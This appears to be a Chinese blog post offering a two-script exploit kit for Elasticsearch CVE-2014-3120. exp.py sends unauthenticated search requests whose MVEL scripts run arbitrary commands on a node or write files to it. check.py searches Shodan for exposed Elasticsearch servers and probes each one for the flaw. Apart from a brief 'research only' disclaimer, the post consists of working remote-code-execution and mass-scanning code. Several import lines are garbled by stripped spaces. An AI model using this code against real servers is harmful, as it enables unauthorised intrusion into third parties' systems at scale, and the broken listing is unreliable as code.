
elasticsearch 漏洞利用工具套装


Elasticsearch 是一个基于 Lucene 构建的开源、分布式、RESTful 搜索引擎,设计用于云计算环境,能够实现实时搜索,稳定、可靠、快速,安装使用方便,支持通过 HTTP 使用 JSON 进行数据索引。下面的工具利用的是 CVE-2014-3120:1.2.0 之前的版本默认开启动态脚本(MVEL),未经认证的请求即可通过 `_search` 的 `script_fields` 在节点上执行任意代码。



请勿用于非法用途,只供漏洞研究之用

因该脚本造成法律问题,作者概不负责,如果违反相关规定,请通知管理员删除该文章

exp.py:利用脚本。通过 POST /_search 提交带 script_fields 的查询在目标上执行命令(-c,默认 whoami);指定 -P 时改为向目标路径写入一个测试文件(文件写入/上传演示)。

exp.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# by heshang  ha.cker@me.com
# NOTE: the coding cookie must be on line 1 or 2 to take effect; the original
# listing had it on line 3, where Python ignores it.
importhttplib
importurllib,urllib2
importsimplejson
importstring
importsys
fromoptparseimportOptionParser
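print('Elasticsearch ExpLoit By Heshang')
print('2014-06-23')

# Command-line definition.  Only the target host/IP is positional; the port
# and the command are options, so the usage line says so.  (The original
# usage read "%prog ip [port] [command]", but parse_args() below never
# consumed a positional port or command -- they were only reachable via
# -p / -c.)
options = OptionParser(
    usage='%prog [options] ip',
    description='elasticsearch command exec exploit (CVE-2014-3120)',
)
# Default given as an int so it agrees with type='int' instead of relying on
# optparse coercing the string '9200'.
options.add_option('-p', '--port', type='int', default=9200,
                   help='The elasticsearch port (default: 9200)')
options.add_option('-c', '--cmd', type='str', default='whoami',
                   help='command to test (default: whoami)')
options.add_option('-P', '--path', type='str', default='',
                   help="Upload file's path (when set, the file-write payload "
                        "is sent instead of the command)")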
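def post(ip, port, exp, timeout=30):
    """Send one scripted `_search` request and return the raw response body.

    The script in `exp` is placed in a `script_fields` entry of a match_all
    query.  That is the CVE-2014-3120 vector: Elasticsearch before 1.2.0
    shipped with dynamic scripting enabled, so an unauthenticated client can
    have the node evaluate arbitrary MVEL.  `size: 1` makes the script run
    for a single hit, so its value lands in hits[0].fields.exp.

    Args:
        ip: target host or IP.
        port: target HTTP port (int).
        exp: complete script source to evaluate on the node.
        timeout: socket timeout in seconds.  The original set none, so an
            unresponsive host hung the tool indefinitely; pass None to get
            the old blocking behaviour.

    Returns:
        The HTTP response body exactly as the server sent it (JSON text on
        success, an error document when scripting is disabled or the node
        is patched).

    Raises:
        socket.error / socket.timeout / httplib.HTTPException on transport
        failures; callers decide how to report them.
    """
    body = simplejson.dumps({
        "size": 1,
        "query": {"filtered": {"query": {"match_all": {}}}},
        "script_fields": {"exp": {"script": exp}},
    })
    headers = {
        "User-agent": "Mozilla/5.0 (windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)",
        # The original sent "ext/html" -- a typo, harmless but wrong.
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Content-Type": "application/json; charset=utf-8",
        "Connection": "keep-alive",
    }
    # Host and port passed separately (rather than "host:port" in one string)
    # so a bare IPv6 literal works too.
    conn = httplib.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request('POST', '/_search?source', body, headers)
        return conn.getresponse().read()
    finally:
        # The original never closed the connection; one probe per call, so
        # release the socket deterministically.
        conn.close()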
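def exec_command(ip, port, cmd):
    """Run `cmd` on the target through the script field and return the raw body.

    The script is MVEL (Java-like): Runtime.exec(cmd) is started, its stdout
    is read line by line and the lines are concatenated with a trailing '|'
    after each one -- the caller splits on '|'.  Only stdout is captured;
    stderr is lost.  Runtime.exec(String) tokenises on whitespace and does
    not go through a shell, so pipes, redirects and quoting are not
    interpreted.

    `cmd` ends up inside a Java string literal.  The original concatenated it
    raw, so a double quote or backslash in the command broke the script;
    here it is encoded with the JSON encoder, whose escape forms are also
    valid Java/MVEL string escapes, and which supplies the surrounding quotes.

    Args:
        ip: target host or IP.
        port: target HTTP port.
        cmd: command line to execute on the node.

    Returns:
        The raw response body from post().
    """
    cmd_literal = simplejson.dumps(cmd)  # quoted and escaped
    exp = (
        'import java.util.*;\n'
        'import java.io.*;\n'
        'String str = "";'
        'BufferedReader br = new BufferedReader(new InputStreamReader('
        'Runtime.getRuntime().exec(' + cmd_literal + ').getInputStream()));'
        'StringBuilder sb = new StringBuilder();'
        'while ((str = br.readLine()) != null) { sb.append(str + "|"); }'
        'sb.toString();'
    )
    return post(ip, port, exp)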
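def save_file(ip, port, path):
    """Write a marker file at `path` on the target and return the raw body.

    This is a file-write primitive proof: the fixed content 'testtesttest'
    is written (UTF-8) to `path`, silently overwriting an existing file.
    The original listing also carried, commented out, a complete JSP
    file-manager/web-shell as alternative `upload` content; it is dropped
    here as dead code -- and because a listing should not hand it out.  A
    JSP drop would additionally need a writable path under a servlet
    container's webroot, which this tool does nothing to discover.

    `path` and the content are embedded in Java string literals through the
    JSON encoder, so backslashes (Windows paths) and quotes no longer break
    the script as they did with raw concatenation.

    The script's last statement is an `if`, so whether "success" comes back
    as the field value depends on MVEL's block-value rules; treat the
    result as informational and verify the file independently.

    Args:
        ip: target host or IP.
        port: target HTTP port.
        path: absolute path on the node to write.

    Returns:
        The raw response body from post().
    """
    upload = 'testtesttest'
    path_literal = simplejson.dumps(path)
    upload_literal = simplejson.dumps(upload)
    exp = (
        'import java.util.*;\n'
        'import java.io.*;\n'
        'File f = new File(' + path_literal + ');'
        'if (f.exists()) { "exists".toString(); }'
        'BufferedWriter bw = new BufferedWriter(new OutputStreamWriter('
        'new FileOutputStream(f), "UTF-8"));'
        'bw.write(' + upload_literal + ');'
        'bw.flush();'
        'bw.close();'
        'if (f.exists()) { "success".toString(); }'
    )
    return post(ip, port, exp)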
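def _script_result(body):
    """Extract hits[0].fields.exp from a `_search` response body as a string.

    Returns None when the body is not JSON or lacks that path -- what a
    patched node (dynamic scripting disabled -> error document), a proxy in
    front of it, or a non-Elasticsearch listener produces.  The original
    indexed blindly and died with a KeyError/IndexError traceback there.
    """
    try:
        value = simplejson.loads(body)['hits']['hits'][0]['fields']['exp']
    except (ValueError, KeyError, IndexError, TypeError):
        return None
    # Elasticsearch 1.x wraps script_fields values in a list (which is why
    # the original's '%s' formatting produced repr-looking output); older
    # nodes return the bare value.  Normalise to one string.
    if isinstance(value, list):
        return ''.join('%s' % v for v in value)
    return '%s' % value


def main():
    """CLI entry point: one target, one payload, result printed to stdout.

    With -P the file-write payload is sent and the field value printed as-is;
    otherwise the command payload is sent and its '|'-joined stdout is
    printed one line per row.
    """
    opts, args = options.parse_args()
    if not args:
        options.print_help()
        return
    target = args[0]

    if opts.path:
        body = save_file(target, opts.port, opts.path)
    else:
        body = exec_command(target, opts.port, opts.cmd)

    result = _script_result(body)
    if result is None:
        print('no script result in response (patched node, auth in front '
              'of it, or not Elasticsearch); raw body follows:')
        print(body)
        return

    if opts.path:
        print(result)
        return

    # exec_command's script appends '|' after every stdout line, so the last
    # element of the split is always the empty tail; drop it.
    lines = result.split('|')
    if lines and lines[-1] == '':
        lines.pop()
    for line in lines:
        print(line)


if __name__ == '__main__':
    main()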

check.py:批量检测脚本。需要安装 shodan 模块(pip install shodan)并在 API_KEY 中填入自己的 Shodan API key;脚本用 Elasticsearch 根路径的 banner 作为 Shodan 搜索词,对每个命中的主机向 9200 端口发送一个只计算 Integer.toHexString(31415926) 的脚本探测请求,返回结果即说明动态脚本可执行。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# by ha.cker@me.com
# NOTE: the coding cookie must be on line 1 or 2 to take effect; the original
# listing had it on line 3, where Python ignores it.
importtime
importshodan
importsys
importurllib
importsimplejson
importsocket
# Start-up banner, one line per entry.
_BANNER = (
    '******************************************************',
    '*          Elasticsearch vul found Tool              *',
    '*          Write by ha.cker@me.com                   *',
    '*   U can use shodan api to search the vul host      *',
    '******************************************************',
)
for _line in _BANNER:
    print(_line)

# Configuration
# Shodan API key.  Left empty on purpose: never commit a real key into this
# file -- paste it in locally, or better, load it from the environment.
API_KEY = ""
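# Integer.toHexString(31415926) as a node that actually executes the probe
# script returns it.  Comparing against the value -- not merely the presence
# of the field -- rules out listeners that echo back anything with "fields".
_CHECK_MARKER = '1df5e76'


def _probe_url(ip):
    """Build the GET `_search?source=...` probe URL for `ip` on port 9200.

    The query is the same as the exploit's (match_all, size 1, one script
    field) but the script is a harmless constant expression.  Like the
    original, only the double quotes are percent-encoded; unlike the
    original, the JSON is generated and therefore balanced (the hand-written
    URL carried one closing brace too many).
    """
    query = simplejson.dumps({
        "size": 1,
        "query": {"filtered": {"query": {"match_all": {}}}},
        "script_fields": {"t": {"script": "Integer.toHexString(31415926)"}},
    }, separators=(',', ':'))
    return 'http://%s:9200/_search?source=%s' % (ip, query.replace('"', '%22'))


def _fetch(url):
    """Default transport: GET `url` with a 3 s socket timeout, return the body."""
    socket.setdefaulttimeout(3)
    return urllib.urlopen(url).read()


def check(ip, fetch=None):
    """Probe one host for CVE-2014-3120 and print it when the script ran.

    Args:
        ip: host or IP; port 9200 is assumed (the original hard-codes it too).
        fetch: optional callable url -> response body, for tests or another
            transport.  Defaults to urllib with a 3 s timeout.

    Returns:
        True when the response carries the expected marker (the script was
        evaluated, i.e. dynamic scripting is enabled), False otherwise.
        Transport errors, non-JSON bodies and responses without the field
        all count as False.  The original swallowed every error with bare
        `except: pass` and, when the request itself failed, went on to
        reference `rs` before assignment.
    """
    if fetch is None:
        fetch = _fetch
    try:
        body = fetch(_probe_url(ip))
        values = simplejson.loads(body)['hits']['hits'][0]['fields']['t']
    except (IOError, ValueError, KeyError, IndexError, TypeError):
        # IOError covers socket.error/socket.timeout and urllib's HTTP errors;
        # ValueError covers a non-JSON body.
        return False
    # Elasticsearch 1.x returns script_fields values as a list; older nodes a
    # bare value.
    if not isinstance(values, list):
        values = [values]
    if _CHECK_MARKER not in values:
        return False
    print('found vul host: %s' % ip)
    return True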
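def main():
    """Drive Shodan: page through hosts matching the ES banner, probe each.

    Requires a Shodan API key in the module-level API_KEY.  Pages 1..99 are
    requested; a failed page is reported, waited out for 10 s and skipped
    (as in the original).  Any other error aborts with the page number --
    the original printed the loop variable there, which was unbound when
    the failure happened before the loop started.
    """
    if not API_KEY:
        print('Error: API_KEY is empty -- set your Shodan API key first')
        sys.exit(1)

    # Elasticsearch's root-endpoint tagline as the Shodan search term.
    # Reconstructed from a whitespace-stripped listing; the full banner is
    # "You Know, for Search".
    query = 'You Know, for'

    page = 0
    try:
        api = shodan.Shodan(API_KEY)
        for page in range(1, 100):
            try:
                result = api.search(query, page)
            except Exception as e:  # shodan raises its own APIError; keep broad
                print('Error: %s and sleep 10s' % e)
                time.sleep(10)
                continue
            for service in result['matches']:
                check(str(service['ip_str']))
    except Exception as e:
        print('Error: %s (stopped at page %d)' % (e, page))
        sys.exit(1)


if __name__ == '__main__':
    main()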